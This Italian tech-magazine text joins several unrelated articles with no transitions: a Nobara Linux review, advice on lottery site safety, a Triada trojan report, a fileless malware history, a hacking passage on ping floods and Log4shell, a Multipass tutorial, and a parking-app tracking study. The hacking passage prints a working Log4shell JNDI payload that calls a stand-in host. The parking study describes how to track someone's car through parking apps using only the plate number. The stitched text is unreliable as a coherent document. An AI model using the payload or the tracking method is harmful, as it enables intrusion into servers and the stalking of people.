Fedora è senza dubbio una distribuzione fantastica e popolare, ma non è molto facile da usare per gli utenti non esperti che cercano in Linux la stessa esperienza “punta e clicca” offerta da altri sistemi operativi. I pacchetti di terze parti o proprietari sono inoltre solitamente assenti da una nuova installazione. Secondo i creatori di Nobara, alcune delle cose importanti che mancano in Fedora, specialmente per quanto riguarda i giochi, sono le dipendenze di WINE, obs-studio, i pacchetti di codec di terze parti come quelli per gstreamer, i driver di terze parti come quelli di NVIDIA e anche piccole correzioni ai pacchetti. Nobara si propone di risolvere la maggior parte di questi problemi e di offrire una migliore esperienza per il gioco, lo streaming e la creazione di contenuti. Inoltre, vuole evitare che i nuovi utenti debbano necessariamente aprire il terminale, offrendo loro un’esperienza iniziale più intuitiva attraverso il mouse.

Ci sono tre versioni di Nobara: Official, GNOME e KDE. La prima è rivolta a chi ama le funzionalità di GNOME, ma preferisce il layout di KDE

Un progetto indipendente

Sebbene il progetto utilizzi i pacchetti, il codice e i repository di Fedora, è completamente indipendente da questa distribuzione. Ha il proprio gestore di pacchetti e i propri repository software in aggiunta all’offerta standard di Fedora e tutto è calibrato per soddisfare le esigenze di un nuovo utente orientato al gioco e alla multimedialità. Ci sono tre versioni di Nobara: Official, GNOME e KDE. L’unica differenza tra la ISO ufficiale e quella GNOME è che la prima ha delle estensioni preattivate che le conferiscono un aspetto estetico diverso. A parte offrire un ambiente desktop differente (GNOME con estensioni, GNOME standard e KDE), tutte e tre le versioni hanno pacchetti identici. La ISO ufficiale (testata qui) è rivolta a chi ama le funzionalità di GNOME ma preferisce il layout di KDE. Sono inoltre presenti varie ottimizzazioni ed estensioni per semplificare l’esperienza d’uso e aiutare chi si avvicina al mondo Linux provenendo da quello Windows. L’installazione è semplice e veloce. Dovete solo scaricare l’immagine ISO di installazione da questo link quindi avviarla, selezionare Install quando arrivate al desktop, rispondere ad alcune domande e il processo si completerà autonomamente. Al primo avvio potrebbe essere necessario installare altri codec video e audio. Fatto questo è tutto molto semplice e, che veniate da altri sistemi operativi o siate abituati a lavorare in Linux, non avrete problemi a orientarvi. Gli utenti più esperti possono scegliere la versione GNOME, più facilmente personalizzabile, e sfruttare tutte le migliorie e le scorciatoie per giocare al meglio e gestire senza sforzo ogni genere di contenuto.

Giocare online è qualcosa che facciamo ormai da tempo, anche se solo da pochi anni si è aperta la possibilità di ampliare questa possibilità anche alle lotterie o ai casinò, con l’utilizzo di soldi veri.

Era una pratica sicuramente possibile fin da prima, ma solo di recente la cosa è stata finalmente legalizzata e resa sicura dal controllo effettuato dagli enti preposti, tutelando così tutti gli appassionati del genere e facilitando la partecipazione, senza l’obbligo di presentarsi in ricevitoria.

Nel mondo delle lotterie, il più famoso è sicuramente il Lotto online, ma esistono molti tipi di siti simili anche all’estero, accessibili a chiunque. Ma in che modo è possibile assicurarsi della sicurezza di questi portali?

I rischi del gioco su siti non sicuri

Quando si tratta di dati personali non si scherza ed è sempre bene fare attenzione a quali portali andremo a inserirli. Nel mondo delle lotterie i rischi sono maggiori, dal momento che utilizziamo soldi veri per prendere parte al gioco e il pericolo di truffa e furto è dietro l’angolo.

È fondamentale affidarsi perciò a siti di cui già conosciamo la sicurezza o che possiamo verificare, per non rischiare di subire un furto di dati o di soldi.

Per prendere parte a questi giochi online è infatti richiesta una registrazione, dove è necessario inserire anche un documento di riconoscimento per accertare la maggior età del partecipante, e infine di ricaricare un portafoglio virtuale.

Questo significa rilasciare i propri dati e versare una somma di denaro che, non solo rischiano di essere rubati sul momento, ma il sito stesso potrebbe chiudere in qualsiasi momento, in quanto illegale, con conseguente perdita dei soldi investiti.

Quali sono i siti sicuri?

Il primo termine per riuscire ad avere la certezza che un sito sia sicuro o meno è quello di affidarsi ai canali ufficiali di lotterie di fama assicurata, come ad esempio il sito di gioco del Lotto Italia o, nel caso di lotterie all’estero, il gioco con rendita del Regno Unito e l’Euromillions in Francia.

Quest’ultimo infatti ha avuto un grande successo a livello europeo, partendo dalla Francia nel 2004, distribuendosi presto anche in Spagna, Regno Unito, Portogallo e altri Paesi Europei, fino a diventare una delle lotterie più giocate in Europa.

Ma, nonostante ci si possa fidare dei canali ufficiali, è sempre comunque bene prestare attenzione ad alcuni elementi che ci assicurano della fiducia che possiamo dare a queste piattaforme.

Per quanto riguarda i canali italiani, una certezza assoluta su cui possiamo fare affidamento è la certificazione ADM. Si tratta dell’ente preposto al controllo del gioco anche online, l’Agenzia delle Dogane e dei Monopoli.

Sulla homepage del sito in questione deve apparire la certificazione con il rimando al sito dell’agenzia, dove poter verificare la reale presenza di questo tra le piattaforme sotto la loro sorveglianza. Un sito certificato ADM è un sito legale e perciò assolutamente sicuro.

Conclusioni

Giocare alle lotterie online è possibile, grazie ad alcune garanzie che possono assicurarci della sicurezza del sito a cui ci stiamo iscrivendo.

È sicuramente un buon primo approccio quello di affidarsi solo ai canali ufficiali delle relative lotterie, ma nel caso delle piattaforme italiane è sufficiente verificare che ADM abbia rilasciato la propria certificazione che garantisce per quel sito un gioco legale e sicuro.

La mod si chiama YoWhatsApp e offre la possibilità di inviare numerosi formati di file (fino a 700MB), promette più privacy, nuovi font, un maggiore quantitativo di emoji e un funzionamento più veloce di WhatsApp stesso. Insomma, un bel “bocconcino” per chi usa il programma di messaggistica istantanea ogni giorno, soprattutto per lavoro. Ecco perché è diventata subito popolare, raccogliendo un bacino d’utenza alquanto significativo. Ora, cosa succede quando un prodotto software viene molto usato? Solitamente tende ad attirare le attenzioni di chi vorrebbe utilizzarlo quotidianamente. Purtroppo, e senza volerlo, strizza anche l’occhio ai programmatori di malware e alle organizzazioni criminali che si muovono per sfruttarlo al fine di raggiungere i loro scopi. Ecco spiegato, in poche parole, il perché della nascita di un nuovo dropper contenente il trojan Triada inserito all’interno di YoWhatsApp. Questa mod è stata categorizzata come “estremamente pericolosa”: pare che il trojan in questione sia in grado di iscrivere gli ignari utenti a servizi a pagamento senza il loro consenso…

Uno dei tanti banner pubblicitari che sponsorizzano l’installazione di YoWhatsApp.

Mod: Specchietti (appetibili) per allodole

WhatsApp è uno degli applicativi più utilizzati al mondo. Ed è proprio per questo motivo che nascono in continuazione app parallele e non ufficiali che lo riguardano. Si tratta perlopiù di software che aggiungono al programma ufficiale funzioni che non sono state ancora implementate dalla casa madre (Meta), ma che comunque risultano appetibili per la maggior parte degli utenti. Queste, in gergo anglosassone, vengono definite “WhatsApp mod”, ovvero app modificate e realizzate al fine di poter offrire ciò che WhatsApp ancora non offre. Sono app che vengono sviluppate da aziende o da programmatori indipendenti che, partendo dal codice originale, realizzano applicazioni simili, modificate con le funzioni aggiuntive compatibili con la piattaforma ufficiale. In altri termini, se si installa una di queste mod e si inizia a conversare con uno dei contatti che usa la versione originale, la chat funzionerà perfettamente! C’è da precisare, tuttavia, che a Meta non piace affatto che vengano utilizzate queste app, ed esse non sono ammesse né su Google Play Store né su Apple App Store, perciò si scaricano solo passando da store alternativi. Ma a cosa è dovuta questa reticenza nel permettere l’utilizzo delle WhatsApp mod? In primo luogo, alle funzionalità non ufficiali offerte che sono spesso immorali e, talvolta, illegali. Poi c’è anche da prendere in considerazione il fatto che ogni volta che si scarica da fonti alternative, si rischia di installare applicativi contenenti software malevolo, dannoso per lo smartphone. Inoltre, la maggior parte delle volte non si sa neanche chi le sviluppa e chi gestisce i nostri dati quando le usiamo.

Nel momento in cui scriviamo, sul sito ufficiale (www.yowhatsapp.net) è disponibile per il download la versione 9.52 dell’APK per device Android.

Come difendersi

A individuare il pericolo della mod YoWhatsApp sono stati gli esperti di Kaspersky e, sempre loro, hanno riportato in un report pubblicato sul loro sito dei consigli utili per evitare di cadere nella trappola. Il più banale è quello di non installare la mod in questione e di orientarsi solo su applicazioni presenti negli store ufficiali, senza prelevare file APK da altri siti. Stando all’articolo, infatti, l’applicazione viene sponsorizzata su altri portali e app Android. Bisogna poi ricordare che, nel caso si fosse già installata, questa va subito rimossa, per evitare che vengano sottratte le chiavi di WhatsApp, cosa che la versione 2.22.11.75 dovrebbe essere in grado di compiere. Sempre in base a ciò che dice Kaspersky, l’app modificata è capace di inviare le chiavi d’accesso al server remoto dello sviluppatore. Infine, occhio anche alla mod WhatsApp Plus, che potrebbe contenere la stessa tipologia di codice malevole.

L’installazione di YoWhatsApp deve avvenire scaricando e lanciando l’APK: l’app non è infatti presente sugli store ufficiali di Google e Apple.

Se pensiamo a un attacco informatico, diamo quasi sempre per scontato che alla base vi sia l’infezione di un file, sia esso l’eseguibile di un’applicazione, una libreria di sistema, un documento specifico (XLSX, PDF, ecc.), un elemento quindi con una chiara e ben definita impronta digitale permanente. In realtà esistono malware in grado di infettare un sistema senza necessariamente sfruttare file intermediari, sono in gergo conosciuti come fileless malware e sono ben noti agli esperti di sicurezza informatica da oltre un ventennio. Non lasciando specifiche tracce da rilevare all’interno di un file, questo tipo di malware risulta particolarmente subdolo perché difficilmente scovabile dagli antivirus. In questo articolo, oltre ad esaminare alcune delle metodologie di rilevamento più all’avanguardia, vedremo anche quali sono i fileless malware più noti e come agiscono per portare a termine gli attacchi per cui sono stati programmati.

Come funzionano?

Un malware che non sfrutta i file si affida a ogni altra componente della macchina vulnerabile, o resa tale, per annidarsi e sferrare l’attacco: memoria, firmware (di dispositivi di storage, schede di rete…), BIOS, protocolli e finanche la CPU; una volta annidati, tali malware compiono quelle che tecnicamente sono chiamate operazioni di memory code injection, ovvero l’injection di codice malevolo nella memoria di una specifica applicazione o processo in esecuzione, senza quindi sfruttare nessun file e in modo del tutto trasparente all’utente. L’attacco iniziale avviene proponendo all’utente il download di software malevolo, inviando e-mail di phishing o link a pagine web infette. I malware sono tutti progettati per scaricare in memoria del PC codice infetto (payload) in grado di caricare da remoto script malevoli che generalmente dialogano con applicazioni sicure già installate nel proprio PC e che quindi vengono eseguiti a insaputa dell’utente durante la normale esecuzione di script legittimi (infiltrazione laterale). Tra le applicazioni più utilizzate dagli hacker si segnalano Microsoft PowerShell e Windows Management Instrumentation.

La macro Word che il malware PowerSniff attiva per scaricare uno script malevolo da iniettare in Microsoft Powershell.

I fileless malware che conosciamo

Il 13 luglio del 2001 venne individuato il primo malware di tipo fileless, attaccava i computer con installato Internet Information Services di Microsoft mostrando sulla homepage dei siti gestiti da IIS la scritta “Welcome to http://www.worm.com ! Hacked by Chinese!”. L’infezione, avvenuta sfruttando un buffer overflow di IIS, si propagò fino a raggiungere ben 359mila server. Il malware venne scoperto da Marc Maiffret e Ryan Permeh, dipendenti in forza alla eEye Digital Security. Fu battezzato Code Red per via della bibita, la Mountain Dew Code Red, che i due stavano sorseggiando durante la scoperta. Negli anni successivi la stessa tecnica di attacco è stata impiegata per colpire altri sistemi, nel 2003 il worm SQL Slammer prese di mira Microsoft SQL Server per lanciare attacchi di tipo denial-of-service, nel 2013 il trojan Lurk seminò il panico tra le banche sottraendo diverso denaro. Anche il registro di configurazione di sistema di Windows viene spesso impiegato come tramite per sferrare attacchi di tipo fileless e passare inosservato ai controlli, è il caso del trojan Poweliks, scovato nel 2014. Il malware, divulgato come allegato di posta elettronica di tipo Microsoft Word, salva uno script malevolo codificato nel Registro di Windows (impiegando Microsoft Powershell). Il payload progettato dagli hacker consente di scaricare ed eseguire da remoto altro codice malevolo.
A metà del 2015, nel corso di una conferenza stampa tenutasi a Londra, Kaspersky Labs rivelò di essere stata attaccata da un malware denominato Duqu 2.0. Gli hacker avrebbero agito indisturbati per mesi sulle reti di Kaspersky; l’ipotesi è che stessero facendo un’operazione di ricognizione e ricerca, nella speranza di saperne di più sulle tecnologie di sicurezza messe inm atto dall’azienda. Anche Duqu 2.0 svolge i suoi attacchi malevoli quasi esclusivamente nella memoria della macchina attaccata. Nel 2016, Josh Grunzweig e Brandon Levene della Palo Alto Networks – multinazionale americana di sicurezza informatica con sede a Santa Clara, in California – documentarono l’escalation del malware PowerSniff; distribuito alle vittime tramite e-mail con allegato un documento Microsoft Word, l’attivazione della macro in esso contenuta scarica nel sistema uno script PowerShell in grado di decodificare ed eseguire ulteriori payload dannosi, tutto questo operando esclusivamente in memoria e salvando temporaneamente una DLL dannosa nel file system. Quasi contemporaneamente, Mike Sconzo e Rico Valdez ricercatori della Carbon Black individuarono il ransomware PowerWare operante, grosso modo, alla stessa maniera di PowerSniff. Negli ultimi anni i malware di tipo fileless si sono evoluti sfruttando nuove tecniche e diventando uno degli attacchi informatici più utilizzati dai cybercriminali.

I tool usati dai cybercriminali e come proteggersi

Così come esistono in circolazione applicazioni che consentono agli hacker di sviluppare agevolmente software malevoli, per i malintenzionati sono disponibili anche tool che permettono di sviluppare malware di tipo fileless. Tra i toolkit più impiegati dai cybercriminali: PowerSploit, PowerShell Empire e Cobalt Strike, nato come software di cyber security e diventato uno dei tool preferiti dai cyber criminali per sferrare attacchi malevoli. La protezione da malware di tipo fileless non può passare dai soli software antivirus, che cercano “impronte” del virus nei file, sono necessarie applicazioni in grado di agire a più ampio raggio, per tale motivo nel tempo sono state introdotte specifiche tecniche, ad esempio basate sulla firma dei file eseguibili del sistema operativo. A tale metodologia – soprattutto in ambito aziendale – si affiancano sistemi di endpoint protection e di monitoraggio in tempo reale del traffico di rete.

Nell’aprile 2020, la European Union Agency for Cybersecurity (ENISA) pubblicò un rapporto in cui mostrò che gli attacchi malware di tipo fileless hanno una probabilità dieci volte maggiore di riuscire rispetto a un attacco convenzionale.

Nel mondo degli hacker ci sono stati grandi cambiamenti e la cultura di imparare a intervenire nei computer in modo innovativo per il piacere di farlo si è un po’ persa. Per esempio, se cercate su Google risorse su come hackerare non troverete probabilmente informazioni utili, ma ogni sorta di spam e link di phishing che non vi consigliamo di toccare, neanche con JavaScript disattivato. Tuttavia ci sono molte risorse valide per imparare a fare ricognizioni di rete, test di penetrazione e persino per utilizzare le tecniche di phishing. Siti come https://tryhackme.com, per esempio, vi insegneranno queste abilità con l’obiettivo di insegnarvi a difendervi da esse. TryHackMe rende divertente il processo di apprendimento attraverso la gamification delle esercitazioni, in alcuni casi regalandovi delle macchine virtuali da scaricare e penetrare. Ci sono lezioni, laboratori e concorsi che vi aiuteranno a imparare di tutto, da Metasploit a Maltego. Una parte importante della cultura hacker è rappresentata dalle sfide Capture The Flag (CTF). Chiamato in italiano rubabandiera, il CTF è un gioco tradizionale in cui le squadre competono per cercare di catturare le bandiere dalle basi avversarie e riportarle alla propria. Nella versione hacker, invece, si tratta semplicemente di trovare le “bandiere” (a volte solo file vuoti chiamati flag, altre volte oggetti più interessanti) nascoste da chi ha lanciato la sfida.

Armitage è una GUI per Metasploit. Per utilizzarla, avviate Metasploit Framework dal menu System Service

Un’inondazione di ping

Abbiamo iniziato con il Ping of Death, quindi concludiamo con l’attacco Ping Flood. Invece di un singolo pacchetto malevolo, viene trasmesso un numero enorme di pacchetti di dimensioni legittime. L’idea è quella di sopraffare il computer target inviando più ping di quanti ne possa gestire. Sia il Ping of Death sia il Ping Flood fanno parte dell’ampia categoria degli attacchi Denial of Service (DoS). Su Linux alcune funzioni del comando ping sono disponibili solo per l’utente root. Un esempio è l’opzione -f o flood, che se usata da sola invia le richieste di eco il più velocemente possibile. Se l’aggressore dispone di una larghezza di banda significativamente maggiore e il difensore non ha un firewall che previene gli attacchi DoS, è possibile che un computer ne paralizzi un altro in questo modo. È più comune, tuttavia, che un hacker utilizzi diversi host per inviare i ping, sferrando un attacco DDoS (Distributed Denial of Service o Denial of Service distribuito). L’attacco è in genere effettuato da una botnet sotto il controllo dell’hacker. I gruppi di criminalità informatica possono affittare sezioni di un gruppo di macchine zombie che hanno creato o usarlo direttamente e la banda a disposizione è enorme. Nel 2016 il provider DNS Dyn è stato mandato offline (rendendo inaccessibili molti siti Web popolari) a causa del malware Mirai, che infetta principalmente i dispositivi IoT utilizzando credenziali predefinite. La larghezza di banda totale di questo attacco è stata stimata intorno a 1,2 Tbps. Nel novembre 2021, Microsoft ha rivelato di aver sventato il più grande attacco DDoS della storia, a ben 3,47 Tbps. Si tratta di una quantità di dati 3.000 volte superiore a quella di una LAN gigabit. La vulnerabilità di Log4shell sfruttava l’input non sanificato e poteva arrivare a consentire l’esecuzione di codice remoto. Tutto ciò che un utente malintenzionato doveva ottenere era far sì che un messaggio accuratamente creato, come:

${jndi:ldap://example.com/bad_file}

fosse scritto in un file di log. Come Bash, Log4j esegue la sostituzione delle stringhe sulle espressioni tra parentesi graffe. Nelle giuste circostanze, il contenuto di /bad_file potrebbe essere eseguito immediatamente sul server. Oppure il log può essere elaborato su un altro server e /bad_file può essere eseguito lì in un secondo momento. Se l’esecuzione del codice viene evitata, un aggressore può comunque far sì che la macchina vulnerabile invii dati (come variabili d’ambiente o contenuti di moduli) alla sua.

Un falso senso di sicurezza

In questo caso si abusa della capacità di Java Naming and Directory Interface (JNDI) di recuperare risorse tramite LDAP, ma è possibile utilizzare altri protocolli. Di conseguenza, poco dopo la prima falla ne sono state scoperte altre, e sono state inizialmente diffuse numerose mitigazioni incomplete, che hanno creato un falso senso di sicurezza. Una volta compromesse, le macchine venivano inserite in botnet, paralizzate da ransomware oppure sfruttate per il mining di criptovalute. È interessante che l’attacco Dyn sia stato attribuito (anche se non in modo definitivo) a giocatori scontenti di Minecraft, come anche Log4j. Infatti, per sfruttare Log4j su un server Minecraft vulnerabile, tutto ciò che si doveva fare era postare nella chat lo snippet di codice che abbiamo riportato. Da lì veniva processato da Log4j e, se si verificavano varie condizioni, l’attaccante poteva eseguire del codice. Con questo si conclude il nostro speciale sugli hacker. Naturalmente abbiamo appena scalfito la superficie dell’argomento e abbiamo visto solo una parte della fantastica selezione di strumenti di Parrot, ma speriamo che abbiate imparato qualcosa. Noi sicuramente sì! Come ultimo esperimento abbiamo preso in considerazione un vecchissimo nostro sito in Drupal. Poiché siamo appassionati di storia digitale, abbiamo archiviato la maggior parte di esso in una macchina virtuale e, dato che oggi parliamo di toolkit per hacker, abbiamo pensato di provare a violarla. Nmap ha rivelato che stava eseguendo il seguente antico software: ProFTPD 1.3.1, Apache 2.2.31, OpenSSH 4.7p1 e Subversion (nessun numero di versione rilevato). Per quanto ci abbiamo provato, però, nessuno dei nostri exploit ha funzionato. Abbiamo usato ZAP (Zed Attack Proxy) di OWASP (Open Web Application Security Project, https://owasp.org) per cercare di attaccare i vecchi moduli di archivio, ma senza successo. ZAP funziona impostando un proxy person in the middle in grado di manipolare le richieste perché vengano inviate al server Web in esame e di ispezionare le risposte. Abbiamo anche provato Metasploit, che meriterebbe un intero articolo a sé stante. Tuttavia il fantasma della nostra macchina, a quanto pare, è inviolabile. A  dimostrazione che, nel mondo degli hacker, bisogna sempre aspettarsi l’impossibile.

Wireshark è in grado di sniffare quasi tutti i pacchetti sulla vostra LAN

Agli sviluppatori piace poter avviare rapidamente delle macchine virtuali per i test ma quando scrivono codice su piattaforme diverse diventa un po’ più complesso farlo usando differenti stack di virtualizzazione. Ubuntu fornisce però una soluzione per creare VM veloci e “usa e getta” su computer basati su processori Intel che è anche supportata dai nuovi dispositivi con chip Apple M1, seppure con alcune limitazioni. Si chiama Multipass ed è un front-end per avviare macchine virtuali, ma può supportare molti back-end diversi, tra cui Virtual Box, LXD, KVM e altri. L’installazione di Multipass in Linux richiede che sia presente Snap:

$ sudo snap install multipass

$ sudo snap info multipass

Trovate le istruzioni per l’installazione in Windows e macOS all’indirizzo https://multipass.run. Multipass è disponibile sia a riga di comando sia con un’interfaccia grafica rudimentale. Qui utilizzeremo la versione a riga di comando perché offre una maggiore flessibilità. Al termine dell’installazione dello strumento, è consigliabile riavviare il sistema.

Primi passi con Multipass

Per iniziare a usare Multipass, aprite una finestra del terminale e usate il seguente comando:

$ multipass launch

 Scaricherà e creerà una nuova macchina virtuale con un nome generato dinamicamente. La prima volta, la creazione di una VM potrebbe richiedere qualche istante, perché bisogna scaricare l’immagine di base di Ubuntu. Per impostazione predefinita, il tool utilizzerà l’ultima immagine di Ubuntu server disponibile per l’uso in Multipass sulla piattaforma su cui è in esecuzione. Questa prima macchina virtuale è speciale ed è contrassegnata come istanza primaria. Di default (in Linux) l’istanza primaria monta anche la cartella Home dell’utente. Nella macchina virtuale viene visualizzata come una cartella denominata Home all’interno della directory Home esistente, quindi potete accedere ai file come se facessero parte del normale filesystem. Le macchine virtuali aggiuntive richiedono un ulteriore comando:

$ multipass mount $HOME

lfexample4 /home/home

È possibile avere più mount su una stessa macchina virtuale e non è necessario esportare i mount in una variabile. Si possono sostituire le variabili con dei percorsi: per esempio, $HOME potrebbe essere Downloads per esporre alla VM solo la cartella degli scaricamenti. Lo smontaggio si effettua utilizzando il comando unmount : multipass umount lfexample4 / home/home. Si può accedere alla macchina virtuale primaria anche tramite una console grafica, aprendo il menu a tendina e selezionando open shell. Altri modi per ottenere una shell nella VM includono il comando Multipass shell che si può usare per eseguire una shell BASH interattiva, come segue: $ multipass shell lfexample. Una volta all’interno della shell, la macchina virtuale può essere trattata come qualsiasi altra. Sono disponibili tutti i soliti comandi. Ad esempio, per installare Apache basta usare: $ sudo apt-get install apache2. Utilizzando un browser per collegarsi all’indirizzo IP della macchina virtuale si visualizza la pagina di installazione predefinita di Apache. Ottenere un elenco di tutte le macchine in esecuzione è semplice:

$ multipass list –all

Regolare le risorse

Per impostazione predefinita, Multipass fornisce una quantità modesta di RAM e CPU alle nuove macchine virtuali: un solo core della CPU e 1GB di RAM. Fortunatamente è facile dare più risorse alla VM. In questo esempio le abbiamo fornito 4GB di RAM e due core della CPU. È anche possibile utilizzare questi interruttori quando si crea la macchina virtuale primaria, se si vuole: $ multipass launch -c 2 -m 4G –name lfexample2. L’opzione -c si riferisce al numero di core della CPU e -m è per la memoria. Quest’ultima si aspetta un’unità di misura dopo il numero, che sia k per Kilobyte, m per Megabyte o g per Gigabyte. Le stesse opzioni personalizzate sono disponibili usando l’opzione -d per il dimensionamento del disco. Per tenere traccia delle macchine virtuali create basta usare multipass list che ne visualizza il nome, cosa eseguono, gli indirizzi IP e il sistema operativo in uso. Per ottenere ulteriori informazioni su una macchina virtuale, utilizzate il parametro info e il suo nome, come mostrato di seguito. Questa operazione consente di vedere i dettagli hardware e software delle macchine virtuali: $ Multipass info lfexample2. Potreste aver notato che gli indirizzi IP non si trovano sulla rete locale. Questo perché per impostazione predefinita utilizzano il NAT (Network Address Translation ovvero traduzione degli indirizzi di rete). In altre parole, si trovano in una rete privata che può raggiungere Internet. Sono invisibili a tutto il resto della rete. Per cancellare i due esempi che abbiamo creato (e trattare l’arresto e l’avvio) ci sono dei parametri di Multipass da utilizzare, come $ multipass stop <nome vm> oppure $ multipass start <nome vm> . Dopo l’arresto, utilizzate il comando $ multipass delete <nome vm>. Non chiede conferma e cancella la macchina virtuale. Per recuperare una VM che è stata eliminata, utilizzate invece il comando $ multipass recover <VM cancellata>.

Una cosa che è ormai difficile da ignorare anche per chi non si intende di sicurezza informatica, è la proliferazione delle videocamere di sorveglianza nelle strade. Ormai sembra essere la soluzione preferita da qualsiasi amministrazione per risolvere il problema della sicurezza nelle strade. Questa apparente soluzione, però, porta con se un rischio importante: quello per la privacy. Che è sicuramente vissuto dalla popolazione con un diritto molto trascurabile, ma probabilmente solo a causa di una scarsa competenza in ambito informatico, che non permette a tutti di cogliere le implicazioni di una sorveglianza così estesa. Soprattutto perché tutti danno per scontato che i dati saranno sempre custoditi in una sorta di cassaforte inespugnabile. Mentre in questi anni abbiamo già assistito a cronache che, in giro per l’Europa e nel Regno Unito, ci testimoniano che non è sempre così.

Dal controllo del traffico allo stalking

Tra le varie tipologie di videocamere installate nelle nostre strade, alcune sono specificamente progettate per il controllo del traffico. Queste videocamere sono collegate a un software per il riconoscimento dei numeri di targa (Licence Plate Recognition). Tutti sanno che questo tipo di videocamere è messo a disposizione delle forze dell’ordine e della magistratura per risalire agli autori di infrazioni o reati. Ma ormai da anni queste sono utilizzate anche per applicazioni commerciali a grande diffusione: la più comune riguarda i parcheggi. Quando utilizziamo un parcheggio a pagamento, spesso vi sono sistemi di riconoscimento delle targhe. Vengono utilizzati sia per tracciare gli automobilisti e evitare che qualcuno vada via senza pagare, sia per eseguire pagamenti automatici. Sono infatti disponibili, in alcune città, delle soluzioni di sosta “al volo”: non c’è bisogno di iniziare manualmente la sosta, usando l’app o una colonnina per il pagamento. Se si dispone di un account nell’app del gestore del parcheggio, appena la videocamera riconosce la targa in un posteggio viene registrato l’inizio della sosta, che ovviamente termina appena si sposta il veicolo. Se si deve solo fare un acquisto veloce in un negozio non si perde tempo: si parcheggia, si va nel negozio, e si riprende l’automobile. Se la sosta è durata sei minuti, il corrispettivo per quei pochi minuti verrà automaticamente detratto dall’account. Questo vale anche per le varie situazioni di sosta gratuita con limite temporale, nei quali la targa viene registrata per assicurarsi che la permanenza nel posteggio non superi il limite imposto (es: 30 o 60 minuti, la classica sosta con “disco orario”). Naturalmente, queste app e il connesso riconoscimento delle targhe vengono anche usati per notifiche, per esempio per ricordare a un utente dove ha lasciato la macchina, da quanto tempo, e quanto sta pagando. Ed è qui che si presenta la vulnerabilità: queste sono informazioni sensibili, perché permettono di identificare in tempo reale la posizione di un veicolo. Se fossero accessibili soltanto al legittimo proprietario non ci sarebbe alcun problema, ma come fare a identificarlo? La soluzione di molti servizi di parcheggio è in realtà priva di qualsiasi meccanismo di identificazione: per utilizzarli basta inserire il numero di targa. Questo significa che chiunque conosca la targa di una potenziale vittima, può iscriversi a suo nome e ricevere notifiche sui suoi spostamenti. Non è in alcun modo necessario dimostrare di essere i legittimi proprietari del veicolo.

Usando le notifiche ricevute, platescan traccia la posizione del veicolo e ricostruisce il suo tragitto da un parcheggio all’altro.
[FONTE: https://notmyplate.com/whitepaper/]

Lo studio olandese

Lo studio olandese si è basato su due gestori dei parcheggi diffusi in tutta Europa: Indigo e Q-Park. A un campione selezionato casualmente di 120 utenti volontari è stato richiesto di fornire il proprio numero di targa. Gli autori dello studio (il gruppo di ricerca Intidc) hanno poi sfruttato le API dei backend cui si appoggiano le app di Indigo e Q-Park per tracciare tutte le targhe. La metodologia è in realtà piuttosto semplice: si sfrutta il facile session hijacking, dal momento che l’unica “autenticazione” è data dal numero di targa. Per seguire una automobile è in molti casi sufficiente creare automaticamente un nuovo account, assegnarvi del credito o un metodo di pagamento (es: PayPal), e il numero di targa, dichiarando di avere iniziato una nuova sosta in un parcheggio supportato dal gestore selezionato. A questo punto si effettua un pagamento per la sosta in questione, e da questo momento l’account creato verrà considerato legittimamente associato alla targa. Sostanzialmente, la sicurezza è affidata all’idea che nessuno pagherebbe una sosta per conto di qualcun altro. Che per le persone normali potrebbe anche essere vero, ma uno stalker o qualche altro tipo di criminale probabilmente non si farebbe troppi problemi a spendere qualche spicciolo pur di poter in futuro tracciare la posizione di una vittima. Un account connesso a una targa, infatti, riceve automaticamente delle notifiche dal server su tutte le future soste effettuate, e a volte (dipende dal gestore del parcheggio) persino sulle potenziali soste: quando una automobile, che magari è solo di passaggio e non ha davvero intenzione di parcheggiare, viene riconosciuta da una videocamera, il server fornisce la lista dei luoghi di parcheggio più vicini. E questo consente di tracciare la posizione di un veicolo entro un certo raggio. Siccome è disponibile una mappa di tutti i punti di parcheggio, è possibile tracciare la posizione di un utente per molto tempo, interrogando le API del server e memorizzando tutte le notifiche che arrivano.

Lo script Platescan interroga periodicamente le API dei gestori di parcheggio Indigo e Q-Park per leggere eventuali notifiche sull’inizio di una nuova sosta.
[FONTE: https://notmyplate.com/whitepaper/]

Entità della vulnerabilità

Questa vulnerabilità non è dovuta a un bug, ma a una scelta di progettazione di molte app dei gestori dei parcheggi europei. Per incentivare gli utenti a utilizzarle è stata tolta ogni complicazione possibile, è questo significa qualsiasi meccanismo di identificazione reale.  L’autore dello studio propone una serie di possibili meccanismi di identificazione del legittimo proprietario del veicolo, ma è probabile che nessuno di essi possa davvero essere utilizzato: gli utenti sono pigri, e se si aggiunge qualche complicazione è possibile che smettano di usare l’app. Il problema è che basta avere una automobile e usarla per essere potenzialmente tracciabili, non è necessario che l’utente abbia nemmeno mai usato le app per pagare il parcheggio.
Per quanto riguarda l’Italia, gli autori dello studio hanno trovato tre diversi gestori di parcheggio potenzialmente vulnerabili: EasyPark, Interparking, e APCOA. Per Interparking le API consentono a una utenza di assegnarsi un unico numero di targa, e questo renderebbe più complesso un eventuale tentativo di sorveglianza di massa, sarebbe necessario creare tanti diversi account, ma è comunque piuttosto facile seguire una unica “vittima”. In altre parole, questa metodologia potrebbe dare a schiere di stalker e altri criminali la possibilità di seguire con facilità delle vittime.

La soluzione

Come accennavamo, una vera soluzione non esiste: soltanto una vera identificazione del legittimo proprietario del veicolo potrebbe funzionare, ma è improbabile che accada perché gli utenti preferiscono la comodità alla sicurezza. L’unica attuale mossa per chi è preoccupato di poter essere seguito, in particolare persone che temono di essere vittime di uno stalker, è chiedere ai gestori dei parcheggi di rimuovere la propria targa dai database e evitare di registrarla in futuro. Considerando che il numero di targa di un veicolo è un dato sensibile, è possibile chiederne la rimozione scrivendo al responsabile per il GDPR di ogni azienda. Sarebbe anche auspicabile una sorta di “registro delle opposizioni”, che però funzionerebbe soltanto se tutte le aziende che gestiscono parcheggi accettassero di rispettarlo.

Una tabella delle app di parcheggio dei principali paesi europei, stilata dai responsabili dello studio sul session hijacking.
[FONTE: https://notmyplate.com/whitepaper/]